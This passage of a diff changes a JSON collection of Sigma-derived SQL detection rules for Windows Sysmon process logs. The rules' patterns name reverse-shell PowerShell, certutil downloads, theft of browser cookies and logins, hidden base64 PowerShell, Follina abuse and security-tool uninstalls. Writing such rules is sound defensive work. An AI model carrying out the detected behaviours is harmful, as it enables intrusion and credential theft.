However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "status": "test", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') 
AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.initial_access", - "attack.t1190", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND 
ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE 
'%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the 
\"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" - }, - { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. 
As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative might use this function to check network connectivity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", - "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" - }, - { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate use of one of these tools" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 
'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 
'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1204" - ], - "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR 
